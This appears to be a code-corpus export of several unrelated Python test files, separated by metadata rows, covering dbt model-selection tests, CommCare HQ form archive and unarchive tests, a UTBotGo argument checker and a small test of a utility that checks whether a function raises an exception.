    self.assertTablesEqual("summary_expected", "users_rollup")

    created_models = self.get_models_in_schema()
    self.assertIn('emails_alt', created_models)
    self.assertNotIn('base_users', created_models)
    self.assertNotIn('emails', created_models)
    # grandchild is past the +1 limit
    self.assertNotIn('users_rollup_dependency', created_models)
    self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__specific_model_and_parents(self):
    """'+users_rollup' selects the named model plus all of its ancestors."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['run', '--select', '+users_rollup'])
    self.assertEqual(len(results), 2)
    self.assertTablesEqual("seed", "users")
    self.assertTablesEqual("summary_expected", "users_rollup")

    created_models = self.get_models_in_schema()
    self.assertFalse('base_users' in created_models)
    self.assertFalse('emails' in created_models)
    self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__specific_model_and_parents_limited(self):
    """'1+users_rollup' selects the named model plus only direct parents."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['run', '--select', '1+users_rollup'])
    self.assertEqual(len(results), 2)
    self.assertTablesEqual("seed", "users")
    self.assertTablesEqual("summary_expected", "users_rollup")

    created_models = self.get_models_in_schema()
    self.assertFalse('base_users' in created_models)
    self.assertFalse('emails' in created_models)
    self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__specific_model_with_exclusion(self):
    """--exclude by file path removes a model from a graph selection."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(
        ['run', '--select', '+users_rollup', '--exclude', 'models/users_rollup.sql']
    )
    self.assertEqual(len(results), 1)
    self.assertTablesEqual("seed", "users")

    created_models = self.get_models_in_schema()
    self.assertFalse('base_users' in created_models)
    # excluded by path even though selected by the graph operator
    self.assertFalse('users_rollup' in created_models)
    self.assertFalse('emails' in created_models)
    self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__locally_qualified_name(self):
    """A fully-qualified path ('test.subdir') and a glob path
    ('models/test/subdir*') both select the models under that subdirectory."""
    results = self.run_dbt(['run', '--select', 'test.subdir'])
    self.assertEqual(len(results), 2)
    created_models = self.get_models_in_schema()
    self.assertNotIn('users_rollup', created_models)
    self.assertNotIn('base_users', created_models)
    self.assertNotIn('emails', created_models)
    self.assertIn('subdir', created_models)
    self.assertIn('nested_users', created_models)
    self.assert_correct_schemas()

    # same selection spelled as a path glob
    results = self.run_dbt(['run', '--select', 'models/test/subdir*'])
    self.assertEqual(len(results), 2)
    created_models = self.get_models_in_schema()
    self.assertNotIn('users_rollup', created_models)
    self.assertNotIn('base_users', created_models)
    self.assertNotIn('emails', created_models)
    self.assertIn('subdir', created_models)
    self.assertIn('nested_users', created_models)
    self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__locally_qualified_name_model_with_dots(self):
    """A model whose file name contains dots ('alternative.users') can be
    selected by name and by path glob."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['run', '--select', 'alternative.users'])
    self.assertEqual(len(results), 1)
    created_models = self.get_models_in_schema()
    self.assertIn('alternative.users', created_models)
    self.assert_correct_schemas()

    # same model selected via a path glob
    results = self.run_dbt(['run', '--select', 'models/alternative.*'])
    self.assertEqual(len(results), 1)
    created_models = self.get_models_in_schema()
    self.assertIn('alternative.users', created_models)
    self.assert_correct_schemas()
@use_profile('postgres')
def test__postgres__childrens_parents(self):
    """'@base_users' selects the node, its descendants, and the ancestors
    of those descendants; test_name: method selects tests by their name."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['run', '--select', '@base_users'])
    self.assertEqual(len(results), 5)

    created_models = self.get_models_in_schema()
    self.assertIn('users_rollup', created_models)
    self.assertIn('users', created_models)
    self.assertIn('emails_alt', created_models)
    self.assertIn('alternative.users', created_models)
    self.assertNotIn('subdir', created_models)
    self.assertNotIn('nested_users', created_models)

    results = self.run_dbt(
        ['test', '--select', 'test_name:not_null'],
    )
    self.assertEqual(len(results), 1)
    assert results[0].node.name == 'not_null_emails_email'
@use_profile('postgres')
def test__postgres__more_childrens_parents(self):
    """'@users' expands to descendants plus their ancestors, but ephemeral
    models do not appear in the run results."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['run', '--select', '@users'])
    # users, emails_alt, users_rollup, users_rollup_dependency, but not base_users (ephemeral)
    self.assertEqual(len(results), 4)

    created_models = self.get_models_in_schema()
    self.assertIn('users_rollup', created_models)
    self.assertIn('users', created_models)
    self.assertIn('emails_alt', created_models)
    self.assertNotIn('subdir', created_models)
    self.assertNotIn('nested_users', created_models)

    results = self.run_dbt(
        ['test', '--select', 'test_name:unique'],
    )
    self.assertEqual(len(results), 2)
    assert sorted([r.node.name for r in results]) == ['unique_users_id', 'unique_users_rollup_gender']
@use_profile('postgres')
def test__postgres__concat(self):
    """Multiple --select arguments union their selections."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['run', '--select', '@emails_alt', 'users_rollup'])
    # users, emails_alt, users_rollup
    self.assertEqual(len(results), 3)

    created_models = self.get_models_in_schema()
    self.assertIn('users_rollup', created_models)
    self.assertIn('users', created_models)
    self.assertIn('emails_alt', created_models)
    self.assertNotIn('subdir', created_models)
    self.assertNotIn('nested_users', created_models)
@use_profile('postgres')
def test__postgres__concat_exclude(self):
    """--exclude subtracts a node from the unioned --select arguments."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['run', '--select', '@emails_alt', 'users_rollup', '--exclude', 'emails_alt'])
    # users, users_rollup
    self.assertEqual(len(results), 2)

    created_models = self.get_models_in_schema()
    self.assertIn('users', created_models)
    self.assertIn('users_rollup', created_models)
    self.assertNotIn('emails_alt', created_models)
    self.assertNotIn('subdir', created_models)
    self.assertNotIn('nested_users', created_models)
@use_profile('postgres')
def test__postgres__concat_exclude_concat(self):
    """Multiple --exclude arguments also union before being subtracted,
    for both 'run' and 'test' commands."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(
        ['run', '--select', '@emails_alt', 'users_rollup', '--exclude', 'emails_alt', 'users_rollup']
    )
    # users
    self.assertEqual(len(results), 1)

    created_models = self.get_models_in_schema()
    self.assertIn('users', created_models)
    self.assertNotIn('emails_alt', created_models)
    self.assertNotIn('users_rollup', created_models)
    self.assertNotIn('subdir', created_models)
    self.assertNotIn('nested_users', created_models)

    results = self.run_dbt(
        ['test', '--select', '@emails_alt', 'users_rollup', '--exclude', 'emails_alt', 'users_rollup']
    )
    self.assertEqual(len(results), 1)
    assert results[0].node.name == 'unique_users_id'
@use_profile('postgres')
def test__postgres__exposure_parents(self):
    """'exposure:' selectors resolve an exposure's upstream graph for
    both 'ls' and 'run'."""
    self.run_sql_file("seed.sql")

    results = self.run_dbt(['ls', '--select', '+exposure:seed_ml_exposure'])
    assert len(results) == 2
    assert sorted(results) == ['exposure:test.seed_ml_exposure', 'source:test.raw.seed']

    results = self.run_dbt(['ls', '--select', '1+exposure:user_exposure'])
    assert len(results) == 5
    assert sorted(results) == ['exposure:test.user_exposure', 'test.unique_users_id',
                               'test.unique_users_rollup_gender', 'test.users', 'test.users_rollup']

    results = self.run_dbt(['run', '-m', '+exposure:user_exposure'])
    # users, users_rollup
    assert len(results) == 2

    created_models = self.get_models_in_schema()
    self.assertIn('users_rollup', created_models)
    self.assertIn('users', created_models)
    self.assertNotIn('emails_alt', created_models)
    self.assertNotIn('subdir', created_models)
    self.assertNotIn('nested_users', created_models)
| 39.239766
| 109
| 0.659091
| 1,536
| 13,420
| 5.440755
| 0.080078
| 0.154003
| 0.189183
| 0.090463
| 0.871246
| 0.847433
| 0.829245
| 0.821587
| 0.809381
| 0.780902
| 0
| 0.003132
| 0.214829
| 13,420
| 341
| 110
| 39.354839
| 0.789978
| 0.01237
| 0
| 0.686131
| 0
| 0
| 0.188406
| 0.026117
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.076642
| false
| 0
| 0.014599
| 0.010949
| 0.105839
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
81268bca06f50866dc190d7942f94c0a14a27b55
| 19,762
|
py
|
Python
|
corehq/ex-submodules/couchforms/tests/test_archive.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | 1
|
2020-07-14T13:00:23.000Z
|
2020-07-14T13:00:23.000Z
|
corehq/ex-submodules/couchforms/tests/test_archive.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | 94
|
2020-12-11T06:57:31.000Z
|
2022-03-15T10:24:06.000Z
|
corehq/ex-submodules/couchforms/tests/test_archive.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import mock
from datetime import datetime, timedelta
from django.test import TestCase
from django.test.utils import override_settings
from corehq.form_processor.tasks import reprocess_archive_stubs
from corehq.apps.change_feed import topics
from corehq.apps.receiverwrapper.util import submit_form_locally
from corehq.form_processor.interfaces.dbaccessors import CaseAccessors, FormAccessors
from corehq.util.context_managers import drop_connected_signals
from couchforms.signals import xform_archived, xform_unarchived
from corehq.form_processor.tests.utils import FormProcessorTestUtils, use_sql_backend
from corehq.util.test_utils import TestFileMixin
from couchforms.models import UnfinishedArchiveStub
from testapps.test_pillowtop.utils import capture_kafka_changes_context
class TestFormArchiving(TestCase, TestFileMixin):
    """Tests for XForm archive/unarchive behavior.

    Covers the happy path (archiving soft-deletes the form's case and
    records an operation in the form history), the failure-recovery path
    via UnfinishedArchiveStub records and the reprocess_archive_stubs
    celery task, and the xform_archived/xform_unarchived signals.
    """
    file_path = ('data', 'sample_xforms')
    root = os.path.dirname(__file__)

    def setUp(self):
        super(TestFormArchiving, self).setUp()
        self.casedb = CaseAccessors('test-domain')
        self.formdb = FormAccessors('test-domain')

    def tearDown(self):
        FormProcessorTestUtils.delete_all_xforms()
        FormProcessorTestUtils.delete_all_cases()
        super(TestFormArchiving, self).tearDown()

    def testArchive(self):
        """Round-trip: archive soft-deletes the case and appends an
        'archive' history entry; unarchive restores the case and appends
        an 'unarchive' entry."""
        case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
        xml_data = self.get_xml('basic')
        result = submit_form_locally(
            xml_data,
            'test-domain',
        )
        xform = result.xform
        self.assertTrue(xform.is_normal)
        self.assertEqual(0, len(xform.history))

        # bracket the operation so the recorded timestamp can be checked
        lower_bound = datetime.utcnow() - timedelta(seconds=1)
        xform.archive(user_id='mr. librarian')
        upper_bound = datetime.utcnow() + timedelta(seconds=1)

        xform = self.formdb.get_form(xform.form_id)
        self.assertTrue(xform.is_archived)

        case = self.casedb.get_case(case_id)
        self.assertTrue(case.is_deleted)
        self.assertEqual(case.xform_ids, [])

        [archival] = xform.history
        self.assertTrue(lower_bound <= archival.date <= upper_bound)
        self.assertEqual('archive', archival.operation)
        self.assertEqual('mr. librarian', archival.user)

        lower_bound = datetime.utcnow() - timedelta(seconds=1)
        xform.unarchive(user_id='mr. researcher')
        upper_bound = datetime.utcnow() + timedelta(seconds=1)

        xform = self.formdb.get_form(xform.form_id)
        self.assertTrue(xform.is_normal)

        case = self.casedb.get_case(case_id)
        self.assertFalse(case.is_deleted)
        self.assertEqual(case.xform_ids, [xform.form_id])

        [archival, restoration] = xform.history
        self.assertTrue(lower_bound <= restoration.date <= upper_bound)
        self.assertEqual('unarchive', restoration.operation)
        self.assertEqual('mr. researcher', restoration.user)

    def testUnfinishedArchiveStub(self):
        # Test running the celery task reprocess_archive_stubs on an existing archive stub
        case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
        xml_data = self.get_xml('basic')
        result = submit_form_locally(
            xml_data,
            'test-domain',
        )
        xform = result.xform
        self.assertTrue(xform.is_normal)
        self.assertEqual(0, len(xform.history))

        # Mock the archive function throwing an error
        with mock.patch('couchforms.signals.xform_archived.send') as mock_send:
            try:
                mock_send.side_effect = Exception
                xform.archive(user_id='librarian')
            except Exception:
                pass

        # Get the form with the updated history, it should be archived
        xform = self.formdb.get_form(xform.form_id)
        self.assertEqual(1, len(xform.history))
        self.assertTrue(xform.is_archived)
        [archival] = xform.history
        self.assertEqual('archive', archival.operation)
        self.assertEqual('librarian', archival.user)

        # The case associated with the form should still exist, it was not rebuilt because of the exception
        case = self.casedb.get_case(case_id)
        self.assertFalse(case.is_deleted)

        # There should be a stub for the unfinished archive
        unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs), 1)
        self.assertEqual(unfinished_archive_stubs[0].history_updated, True)
        self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
        self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
        self.assertEqual(unfinished_archive_stubs[0].archive, True)

        # Manually call the periodic celery task that reruns archiving/unarchiving actions
        reprocess_archive_stubs()

        # The case and stub should both be deleted now
        case = self.casedb.get_case(case_id)
        self.assertTrue(case.is_deleted)
        unfinished_archive_stubs_after_reprocessing = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs_after_reprocessing), 0)

    def testUnfinishedUnarchiveStub(self):
        # Test running the celery task reprocess_archive_stubs on an existing unarchive stub
        case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
        xml_data = self.get_xml('basic')
        result = submit_form_locally(
            xml_data,
            'test-domain',
        )
        xform = result.xform
        self.assertTrue(xform.is_normal)
        self.assertEqual(0, len(xform.history))

        # Archive the form successfully
        xform.archive(user_id='librarian')

        # Mock the unarchive function throwing an error
        with mock.patch('couchforms.signals.xform_unarchived.send') as mock_send:
            try:
                mock_send.side_effect = Exception
                xform.unarchive(user_id='librarian')
            except Exception:
                pass

        # Make sure the history only has an archive and an unarchive
        xform = self.formdb.get_form(xform.form_id)
        self.assertEqual(2, len(xform.history))
        self.assertFalse(xform.is_archived)
        self.assertEqual('archive', xform.history[0].operation)
        self.assertEqual('librarian', xform.history[0].user)
        self.assertEqual('unarchive', xform.history[1].operation)
        self.assertEqual('librarian', xform.history[1].user)

        # The case should not exist because the unarchived form was not rebuilt
        case = self.casedb.get_case(case_id)
        self.assertTrue(case.is_deleted)

        # There should be a stub for the unfinished unarchive
        unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs), 1)
        self.assertEqual(unfinished_archive_stubs[0].history_updated, True)
        self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
        self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
        self.assertEqual(unfinished_archive_stubs[0].archive, False)

        # Manually call the periodic celery task that reruns archiving/unarchiving actions
        reprocess_archive_stubs()

        # The case should be back, and the stub should be deleted now
        case = self.casedb.get_case(case_id)
        self.assertFalse(case.is_deleted)
        unfinished_archive_stubs_after_reprocessing = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs_after_reprocessing), 0)

    def testUnarchivingWithArchiveStub(self):
        # Test a user-initiated unarchive with an existing archive stub
        case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
        xml_data = self.get_xml('basic')
        result = submit_form_locally(
            xml_data,
            'test-domain',
        )
        xform = result.xform
        self.assertTrue(xform.is_normal)
        self.assertEqual(0, len(xform.history))

        # Mock the archive function throwing an error
        with mock.patch('couchforms.signals.xform_archived.send') as mock_send:
            try:
                mock_send.side_effect = Exception
                xform.archive(user_id='librarian')
            except Exception:
                pass

        # There should be a stub for the unfinished archive
        unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs), 1)
        self.assertEqual(unfinished_archive_stubs[0].history_updated, True)
        self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
        self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
        self.assertEqual(unfinished_archive_stubs[0].archive, True)

        # Call an unarchive
        xform.unarchive(user_id='librarian')

        # The unfinished archive stub should be deleted
        unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs), 0)

        # The case should exist because the case close was unarchived
        case = self.casedb.get_case(case_id)
        self.assertFalse(case.is_deleted)

        # Manually call the periodic celery task that reruns archiving/unarchiving actions
        reprocess_archive_stubs()

        # Make sure the case still exists (to double check that the archive stub was deleted)
        case = self.casedb.get_case(case_id)
        self.assertFalse(case.is_deleted)

    def testArchivingWithUnarchiveStub(self):
        # Test a user-initiated archive with an existing unarchive stub
        case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
        xml_data = self.get_xml('basic')
        result = submit_form_locally(
            xml_data,
            'test-domain',
        )
        xform = result.xform
        self.assertTrue(xform.is_normal)
        self.assertEqual(0, len(xform.history))

        # Archive the form successfully
        xform.archive(user_id='librarian')

        # Mock the unarchive function throwing an error
        with mock.patch('couchforms.signals.xform_unarchived.send') as mock_send:
            try:
                mock_send.side_effect = Exception
                xform.unarchive(user_id='librarian')
            except Exception:
                pass

        # There should be a stub for the unfinished unarchive
        unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs), 1)
        self.assertEqual(unfinished_archive_stubs[0].history_updated, True)
        self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
        self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
        self.assertEqual(unfinished_archive_stubs[0].archive, False)

        # Call an archive
        xform.archive(user_id='librarian')

        # The unfinished archive stub should be deleted
        unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs), 0)

        # The case should not exist because the case close was archived
        case = self.casedb.get_case(case_id)
        self.assertTrue(case.is_deleted)

        # Manually call the periodic celery task that reruns archiving/unarchiving actions
        reprocess_archive_stubs()

        # The history should not have been added to, make sure that it still only has one entry
        # Make sure the case still does not exist (to double check that the unarchive stub was deleted)
        case = self.casedb.get_case(case_id)
        self.assertTrue(case.is_deleted)

    def testUnfinishedArchiveStubErrorAddingHistory(self):
        # Test running the celery task reprocess_archive_stubs on an existing archive stub where the archive
        # initially failed on updating the history
        case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
        xml_data = self.get_xml('basic')
        result = submit_form_locally(
            xml_data,
            'test-domain',
        )
        xform = result.xform
        self.assertTrue(xform.is_normal)
        self.assertEqual(0, len(xform.history))

        # Mock the couch and sql archive function throwing an error (so that this test works for both)
        tmp = 'corehq.form_processor.backends.%s.dbaccessors.%s'
        with mock.patch(tmp % ('sql', 'FormAccessorSQL.set_archived_state')) as mock_operation_sql:
            with mock.patch(tmp % ('couch', 'XFormOperation')) as mock_operation_couch:
                try:
                    mock_operation_sql.side_effect = Exception
                    mock_operation_couch.side_effect = Exception
                    xform.archive(user_id='librarian')
                except Exception:
                    pass

        # Get the form with the updated history, make sure it has not been archived yet
        xform = self.formdb.get_form(xform.form_id)
        self.assertEqual(0, len(xform.history))
        self.assertFalse(xform.is_archived)

        # The case associated with the form should still exist, it was not rebuilt because of the exception
        case = self.casedb.get_case(case_id)
        self.assertFalse(case.is_deleted)

        # There should be a stub for the unfinished archive, and the history should not be updated yet
        unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs), 1)
        self.assertEqual(unfinished_archive_stubs[0].history_updated, False)
        self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
        self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
        self.assertEqual(unfinished_archive_stubs[0].archive, True)

        # Manually call the periodic celery task that reruns archiving/unarchiving actions
        reprocess_archive_stubs()

        # Make sure the history shows an archive now
        xform = self.formdb.get_form(xform.form_id)
        self.assertEqual(1, len(xform.history))
        self.assertTrue(xform.is_archived)
        [archival] = xform.history
        self.assertEqual('archive', archival.operation)
        self.assertEqual('librarian', archival.user)

        # The case and stub should both be deleted now
        case = self.casedb.get_case(case_id)
        self.assertTrue(case.is_deleted)
        unfinished_archive_stubs_after_reprocessing = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs_after_reprocessing), 0)

    def testUnfinishedUnarchiveStubErrorAddingHistory(self):
        # Test running the celery task reprocess_archive_stubs on an existing archive stub where the archive
        # initially failed on updating the history
        case_id = 'ddb8e2b3-7ce0-43e4-ad45-d7a2eebe9169'
        xml_data = self.get_xml('basic')
        result = submit_form_locally(
            xml_data,
            'test-domain',
        )
        xform = result.xform
        self.assertTrue(xform.is_normal)
        self.assertEqual(0, len(xform.history))

        # Archive the form successfully
        xform.archive(user_id='librarian')

        # Mock the couch and sql archive function throwing an error (so that this test works for both)
        tmp = 'corehq.form_processor.backends.%s.dbaccessors.%s'
        with mock.patch(tmp % ('sql', 'FormAccessorSQL.set_archived_state')) as mock_operation_sql:
            with mock.patch(tmp % ('couch', 'XFormOperation')) as mock_operation_couch:
                try:
                    mock_operation_sql.side_effect = Exception
                    mock_operation_couch.side_effect = Exception
                    xform.unarchive(user_id='librarian')
                except Exception:
                    pass

        # Get the form with the updated history, make sure it only has one entry (the archive)
        xform = self.formdb.get_form(xform.form_id)
        self.assertEqual(1, len(xform.history))
        self.assertTrue(xform.is_archived)
        [archival] = xform.history
        self.assertEqual('archive', archival.operation)
        self.assertEqual('librarian', archival.user)

        # The case associated with the form should not exist, it was not rebuilt because of the exception
        case = self.casedb.get_case(case_id)
        self.assertTrue(case.is_deleted)

        # There should be a stub for the unfinished archive, and the history should not be updated yet
        unfinished_archive_stubs = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs), 1)
        self.assertEqual(unfinished_archive_stubs[0].history_updated, False)
        self.assertEqual(unfinished_archive_stubs[0].user_id, 'librarian')
        self.assertEqual(unfinished_archive_stubs[0].domain, 'test-domain')
        self.assertEqual(unfinished_archive_stubs[0].archive, False)

        # Manually call the periodic celery task that reruns archiving/unarchiving actions
        reprocess_archive_stubs()

        # Make sure the history shows an archive and an unarchive now
        xform = self.formdb.get_form(xform.form_id)
        self.assertEqual(2, len(xform.history))
        self.assertFalse(xform.is_archived)
        self.assertEqual('archive', xform.history[0].operation)
        self.assertEqual('librarian', xform.history[0].user)
        self.assertEqual('unarchive', xform.history[1].operation)
        self.assertEqual('librarian', xform.history[1].user)

        # The case should be back, and the stub should be deleted now
        case = self.casedb.get_case(case_id)
        self.assertFalse(case.is_deleted)
        unfinished_archive_stubs_after_reprocessing = UnfinishedArchiveStub.objects.filter()
        self.assertEqual(len(unfinished_archive_stubs_after_reprocessing), 0)

    def testSignal(self):
        """Archiving/unarchiving fires xform_archived/xform_unarchived
        exactly once each."""
        global archive_counter, restore_counter
        archive_counter = 0
        restore_counter = 0

        def count_archive(**kwargs):
            global archive_counter
            archive_counter += 1

        def count_unarchive(**kwargs):
            global restore_counter
            restore_counter += 1

        xform_archived.connect(count_archive)
        xform_unarchived.connect(count_unarchive)

        xml_data = self.get_xml('basic')
        result = submit_form_locally(
            xml_data,
            'test-domain',
        )

        # submitting alone fires neither signal
        self.assertEqual(0, archive_counter)
        self.assertEqual(0, restore_counter)

        result.xform.archive()
        self.assertEqual(1, archive_counter)
        self.assertEqual(0, restore_counter)

        xform = self.formdb.get_form(result.xform.form_id)
        xform.unarchive()
        self.assertEqual(1, archive_counter)
        self.assertEqual(1, restore_counter)
@use_sql_backend
class TestFormArchivingSQL(TestFormArchiving):
    """Re-runs all TestFormArchiving tests against the SQL backend, and
    additionally verifies that archive/unarchive publish kafka changes."""

    @override_settings(TESTS_SHOULD_USE_SQL_BACKEND=True)
    def testPublishChanges(self):
        """Archiving and unarchiving each publish exactly one change for
        the form to the FORM_SQL kafka topic (signals suppressed so only
        the publish side effect is observed)."""
        xml_data = self.get_xml('basic')
        result = submit_form_locally(
            xml_data,
            'test-domain',
        )
        xform = result.xform

        with capture_kafka_changes_context(topics.FORM_SQL) as change_context:
            with drop_connected_signals(xform_archived):
                xform.archive()
        self.assertEqual(1, len(change_context.changes))
        self.assertEqual(change_context.changes[0].id, xform.form_id)

        xform = self.formdb.get_form(xform.form_id)
        with capture_kafka_changes_context(topics.FORM_SQL) as change_context:
            with drop_connected_signals(xform_unarchived):
                xform.unarchive()
        self.assertEqual(1, len(change_context.changes))
        self.assertEqual(change_context.changes[0].id, xform.form_id)
| 43.432967
| 108
| 0.683787
| 2,330
| 19,762
| 5.619742
| 0.092275
| 0.090499
| 0.080648
| 0.04567
| 0.834733
| 0.811899
| 0.803345
| 0.785092
| 0.767985
| 0.767985
| 0
| 0.012352
| 0.233934
| 19,762
| 454
| 109
| 43.528634
| 0.852566
| 0.170479
| 0
| 0.770642
| 0
| 0
| 0.073684
| 0.035006
| 0
| 0
| 0
| 0
| 0.336391
| 1
| 0.039755
| false
| 0.018349
| 0.045872
| 0
| 0.097859
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
812ecbfbc24c58f9fdc18df683d2da5b8ceee4df
| 729
|
py
|
Python
|
examples/test2/.test_checker.py
|
Software-Analysis-Team/UTBotGo
|
973a13d374896a68078a1bf139c73ca515822e99
|
[
"MIT"
] | 1
|
2021-12-03T00:32:58.000Z
|
2021-12-03T00:32:58.000Z
|
examples/test2/.test_checker.py
|
Software-Analysis-Team/UTBotGo
|
973a13d374896a68078a1bf139c73ca515822e99
|
[
"MIT"
] | 8
|
2021-10-30T14:24:54.000Z
|
2022-02-01T16:59:56.000Z
|
examples/test2/.test_checker.py
|
Software-Analysis-Team/UTBotGo
|
973a13d374896a68078a1bf139c73ca515822e99
|
[
"MIT"
] | 2
|
2021-09-18T10:23:26.000Z
|
2021-12-03T00:33:02.000Z
|
#!/usr/bin/env python3
"""Test-checker for the UTBotGo example: for each recorded function call,
read its arguments from args.json, validate them, and write the expected
result to results.json.

The two original stanzas (addInt / multInt) were byte-for-byte duplicates
differing only in function name and operator; they are factored into one
helper driven by a table.
"""
import json
import operator


def _check_function(name, op):
    """Validate the single recorded (x, y) int argument pair for *name*
    and write [{'R': op(x, y)}] as its expected result.

    Raises AssertionError if the recorded arguments do not match the
    expected shape (exactly one call, keys ['x', 'y'], both ints).
    """
    with open('utbotgo/functions/%s/args.json' % name, 'r') as f:
        args = json.load(f)
    assert len(args) == 1
    arg = args[0]
    assert list(arg.keys()) == ['x', 'y']
    # `type(...) is int` (not isinstance) deliberately rejects bools,
    # matching the original `type(x) == int` checks
    assert type(arg['x']) is int and type(arg['y']) is int
    with open('utbotgo/functions/%s/results.json' % name, 'w') as f:
        f.write(json.dumps([{'R': op(arg['x'], arg['y'])}]))


# Run at module level, as the original script did.
_check_function('addInt', operator.add)
_check_function('multInt', operator.mul)
| 31.695652
| 62
| 0.576132
| 118
| 729
| 3.559322
| 0.279661
| 0.07619
| 0.142857
| 0.228571
| 0.938095
| 0.761905
| 0.761905
| 0.761905
| 0.761905
| 0.761905
| 0
| 0.008347
| 0.178326
| 729
| 22
| 63
| 33.136364
| 0.692821
| 0.028807
| 0
| 0.588235
| 0
| 0
| 0.229137
| 0.203678
| 0
| 0
| 0
| 0
| 0.352941
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
814373931c32b603535aaa21c8ae3be668251ede
| 146
|
py
|
Python
|
chest/tests/test_utils.py
|
s-t-e-v-e-n-k/chest
|
2e672418b1225f10f9cb8fd61594393c1a1d954e
|
[
"BSD-3-Clause"
] | 51
|
2015-08-30T19:13:29.000Z
|
2020-04-13T07:59:27.000Z
|
chest/tests/test_utils.py
|
s-t-e-v-e-n-k/chest
|
2e672418b1225f10f9cb8fd61594393c1a1d954e
|
[
"BSD-3-Clause"
] | 10
|
2015-08-21T17:25:45.000Z
|
2021-02-18T20:02:15.000Z
|
chest/tests/test_utils.py
|
s-t-e-v-e-n-k/chest
|
2e672418b1225f10f9cb8fd61594393c1a1d954e
|
[
"BSD-3-Clause"
] | 13
|
2015-01-14T18:57:40.000Z
|
2021-12-31T10:03:28.000Z
|
from chest.utils import raises


def test_raises():
    """raises() must report True for a thunk that throws the given
    exception and False for one that returns normally."""
    throwing = lambda: {}[1]       # KeyError: key absent from empty dict
    returning = lambda: {1: 2}[1]  # evaluates to 2, no exception
    assert raises(KeyError, throwing)
    assert not raises(KeyError, returning)
| 20.857143
| 50
| 0.678082
| 21
| 146
| 4.666667
| 0.619048
| 0.285714
| 0.408163
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0.178082
| 146
| 6
| 51
| 24.333333
| 0.783333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
